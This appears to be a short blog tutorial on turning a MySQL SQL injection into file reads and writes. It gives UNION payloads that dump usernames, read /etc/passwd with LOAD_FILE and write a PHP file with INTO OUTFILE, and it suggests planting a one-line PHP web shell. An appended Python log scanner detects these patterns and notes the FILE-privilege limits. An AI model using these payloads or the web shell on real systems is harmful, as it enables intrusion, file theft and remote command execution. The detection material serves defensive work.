File Write via SQL

Hi folks,

you probably know SQL injections. SQL injections provide a lot of fun when it comes to database manipulation. But they are also a great way to read and write files.

Consider the website In our example, the application provides a version parameter that is susceptible to SQL injection. As a consequence, an attacker is able to do database voodoo like:

' UNION ALL SELECT NULL,NULL,username FROM users--

This should return a list of user names that are stored in the table users. If you have no idea how this actually works, I recommend reading some SQL injection literature given in Further Reading.

Reading Files

The following listing is slightly edited to give us the content of the file /etc/passwd. This is done via LOAD_FILE. Note that this only works with files readable by the database user.

' UNION ALL SELECT NULL,NULL,LOAD_FILE("/etc/passwd") FROM users--

Writing Files

After reading files, let's go ahead and write them. The listing has changed once more to write to an outfile via the SELECT ... INTO OUTFILE statement.

' UNION ALL SELECT NULL,NULL,"<?php echo 'hello world'; ?>" INTO OUTFILE "/var/www/vhosts/"--

The fun part is that our PHP statement is written into /var/vhosts/ Writing files is a big win for every adversary. A possible next step is to write <? system($_GET['cmd']); ?> into a file readable by the web server. In case of success, the attacker has a nice remote shell by using -l.
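Seen from the defending side, the statements above leave recognisable traces in web server access logs. The following is an added example, not part of the original post: it percent-decodes query parameters and flags UNION SELECT, LOAD_FILE and INTO OUTFILE. The log lines, the /app.php path and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Signatures for the statements shown in this post, most severe first.
RULES = [
    ("file_write", re.compile(r"\binto\s+outfile\b", re.I)),
    ("file_read", re.compile(r"\bload_file\s*\(", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
# Combined log format: client, two ignored fields, [time], "METHOD target HTTP/x"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')


def scan_target(target):
    """Return {parameter: [rule names]} for a request target like '/a?b=c'."""
    hits = {}
    # parse_qsl percent-decodes each value, so the rules see the SQL text itself.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        matched = [rule for rule, rx in RULES if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


def scan_access_log(lines):
    """Group findings by client: {client: [(line_no, parameter, rules), ...]}."""
    report = defaultdict(list)
    for number, line in enumerate(lines, 1):
        match = LINE.match(line)
        if not match:
            continue  # not a request line in the expected format
        client, target = match.groups()
        for param, rules in scan_target(target).items():
            report[client].append((number, param, rules))
    return dict(report)


# Constructed sample lines (documentation addresses, hypothetical /app.php).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /app.php?version=1.2 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /app.php?version=%27%20UNION%20ALL%20SELECT%20NULL,NULL,LOAD_FILE(%22/etc/passwd%22)%20FROM%20users-- HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /app.php?version=%27+union+all+select+NULL,NULL,%22x%22+into+outfile+%22/tmp/x%22-- HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, findings in scan_access_log(SAMPLE_LOG).items():
        print(client, findings)
```

Matches are leads for triage, not proof that a file was read or written. On the MySQL side, both LOAD_FILE and SELECT ... INTO OUTFILE require the FILE privilege and are restricted by the secure_file_priv setting, so an application account without FILE cannot use either.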

Further Reading